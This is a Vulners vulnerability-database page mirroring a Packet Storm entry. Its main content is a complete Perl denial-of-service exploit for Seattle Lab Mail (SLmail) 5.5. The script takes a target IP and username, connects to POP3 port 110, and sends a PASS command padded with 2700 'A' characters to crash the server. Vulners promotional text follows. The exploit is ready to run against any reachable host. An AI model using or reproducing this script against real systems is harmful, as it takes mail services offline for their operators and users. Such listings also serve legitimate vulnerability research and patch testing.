Lucene search
K

Seattle Lab Mail 5.5 Denial Of Service

🗓️ 29 Jan 2024 00:00:00Reported by Fernando MengaliType 
packetstorm
 packetstorm
🔗 packetstormsecurity.com👁 238 Views

Seattle Lab Mail (SLmail) 5.5 Denial Of Service exploit using POP3 'PASS

Code
`use IO::Socket;  
  
sub intro {  
print "***************************************************\n";  
print "* Seattle Lab Mail (SLmail) 5.5 *\n";  
print "* *\n";   
print "* Coded By Fernando Mengali *\n";  
print "* *\n";  
print "* POP3 'PASS' Denied of Service - DoS *\n";  
print "* *\n";  
print "***************************************************\n";  
}  
  
intro();  
  
  
if (!$ARGV[0] && !$ARGV[1]) {  
print "\nUsage: $0 <ip> <username>\n";  
exit(0);  
}  
  
my $host = $ARGV[0];  
my $username = $ARGV[1];  
  
  
my $port = 110;  
my $payload = "A" x 2700;  
  
  
my $s = IO::Socket::INET->new(  
PeerAddr => $host,  
PeerPort => $port,  
Proto => 'tcp'  
) or die "Unable to connect: $!\n";  
  
$s->recv(my $data, 1024); # Grab banners (if any)  
$s->send('USER ' . $username . "\r\n");  
$s->recv(my $response, 1024);  
$s->recv(my $data, 1024); # Grab banners (if any)  
$s->send('PASS ' . $payload . "\r\n");  
$s->recv(my $response, 1024);   
$s->send("QUIT\r\n");  
$s->close();  
`

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation

29 Jan 2024 00:00Current
7.4High risk
Vulners AI Score7.4
238